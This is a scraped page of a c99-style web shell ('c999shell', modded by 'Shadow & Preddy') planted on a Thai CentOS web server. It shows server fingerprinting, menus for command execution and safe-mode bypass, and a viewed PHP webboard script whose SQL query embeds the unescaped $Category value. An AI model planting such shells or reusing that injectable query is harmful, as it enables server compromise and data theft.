Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage_22222/webboard/ drwxr-xr-x |
Viewing file: Select action/file-type: <html> <head> <title>บอร์ด 10 อันดับล่าสุด</title> <meta http-equiv="Content-Type" content="text/html; charset=tis-620"> <link href="style.css" rel="stylesheet" type="text/css"> </head> <? function showTop($Category,$showTop) { include("config.inc.php"); include("function.php"); //$chk_date = date("Y-m-d"); $chk_date = substr(date("Y-m-d H:i:s"),-19,-9); mysql_connect($host,$user,$passwd); mysql_query("SET NAMES 'tis620'"); // Query ข้อมูลตามจำนวนที่กำหนด $sql = "select * from webboard_data where Category='$Category' order by No DESC limit 0,$showTop"; $result = mysql_db_query($dbname,$sql) or die("Faied SQL Query"); $NRow = mysql_num_rows($result); if($NRow==0) { echo "<font size=2 face='MS Sans Serif'>ยังไม่มีคำถาม</font><br><br>\n"; } // แสดงหัวข้อของบอร์ด else { echo "<table width=100% border=0 bordercolor=black cellspacing=0 cellpadding=2 bgcolor=''>\n"; // วนลูปแสดงข้อมูลที่อ่านได้ while ($row = mysql_fetch_array($result)) { // กำหนดค่าตัวแปร $No = sprintf("%05d",$row["No"]); $Question = $row["Question"]; if(strlen($Question)>45) { // จำกัดความยาวของกระทู้ที่ 45 ตัวอักษร $Question = substr($Question,0,45)."..."; } $Name = $row["Name"]; $Member = $row["Member"]; //$Date = trim(substr($row["Date"],0,11)); // แสดงเฉพาะวันที่ $ckDate = trim(substr($row["Date"],-19,-9)); // แสดงเฉพาะวันที่ $Date = convert_date($row["Date"]); $Reply = $row["Reply"]; $pageviewdata = $row["pageview"]; $ckReplyDate = trim(substr($row["ReplyDate"],-19,-9)); $ReplyDate = convert_date($row["ReplyDate"]); echo "<tr>\n<td width=15% valign = 'top' align = 'left'>"; // แสดงรูป folder if($Reply>="10" ) { echo "\t<img src='../webboard/pic/hotfd.gif'> \n"; } elseif($ckReplyDate!="") { echo "\t<img src='../webboard/pic/openfd.gif'>\n"; } elseif($Date==$chk_date) { echo "\t<img src='../webboard/pic/newfd.gif'> \n"; } else { echo "\t<img src='../webboard/pic/closefd.gif'> \n"; } if(($ckReplyDate==$chk_date)&&($nphoto!='')&&($ckDate==$chk_date)){ echo "\t<a href='./webboard/show.php?Category=$Category&No=$row[No]' target='$No'>$Question</a> <img src='../webboard/pic/cam.gif' border=\"0\"><font color=red size='2'><img src='../webboard/pic/new2day.gif' border=\"0\"> <img src='../webboard/pic/update2day.gif' border=\"0\"></font>\n"; } elseif(($ckReplyDate==$chk_date)&&($nphoto!='')) { echo "\t<a href='show.php?Category=$Category&No=$row[No]' target='$No'>$Question</a> <img src='../webboard/pic/cam.gif' border=\"0\"><font color=red size='2'> <img src='../webboard/pic/update2day.gif' border=\"0\"></font>\n"; } elseif(($ckReplyDate==$chk_date) &&($ckDate==$chk_date)) {echo "\t<a href='./webboard/show.php?Category=$Category&No=$row[No]' target='$No'>$Question</a> <font color=red size='2'> <img src='../webboard/pic/new2day.gif' border=\"0\"> <img src='../webboard/pic/update2day.gif' border=\"0\"></font>\n"; } elseif($ckReplyDate==$chk_date) {echo "\t<a href='./webboard/show.php?Category=$Category&No=$row[No]' target='$No'>$Question</a> <font color=red size='2'> <img src='../webboard/pic/update2day.gif' border=\"0\"></font>\n"; } elseif(($nphoto!='') &&($ckDate==$chk_date)) {echo "\t<a href='./webboard/show.php?Category=$Category&No=$row[No]' target='$No'>$Question </a><img src='../webboard/pic/new2day.gif' border=\"0\"> <img src='../webboard/pic/cam.gif' border=\"0\">\n"; } elseif($nphoto!='') {echo "\t<a href='./webboard/show.php?Category=$Category&No=$row[No]' target='$No'>$Question </a> <img src='../webboard/pic/cam.gif' border=\"0\">\n"; } elseif($ckDate==$chk_date) {echo "\t<a href='./webboard/show.php?Category=$Category&No=$row[No]' target='$No'>$Question </a> <img src='../webboard/pic/new2day.gif' border=\"0\">\n"; } else{ echo "\t<a href='./webboard/show.php?Category=$Category&No=$row[No]' target='$No'>$Question</a>\n"; } if($Member) { echo "\t<img src='../webboard/pic/online.gif'><FONT face ='MS Sans Serif' size=1>$Name [$Date] </FONT>\n"; } else { echo "\t<FONT face ='MS Sans Serif' size=1>$Name [$Date]</FONT>\n"; } // ตรวจสอบว่ามีคนตอบคำถามหรือยัง if($ckReplyDate!="") { echo "\t<FONT SIZE='1' face =' MS Sans Serif'><B>(<FONT COLOR=#FF0000>$Reply</FONT>/<FONT COLOR=#FF0000>$pageviewdata</FONT>)</B> </font>\n"; } else { echo "\t<FONT SIZE='1' face =' MS Sans Serif'><B>(<FONT COLOR=#FF0000>$Reply</FONT>/<FONT COLOR=#FF0000>$pageviewdata</FONT>)</B> </font>"; } echo "\n</td></tr>\n\n"; } echo "</table>\n\n<BR>"; } mysql_close(); } ?> </body> </html> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0057 ]-- |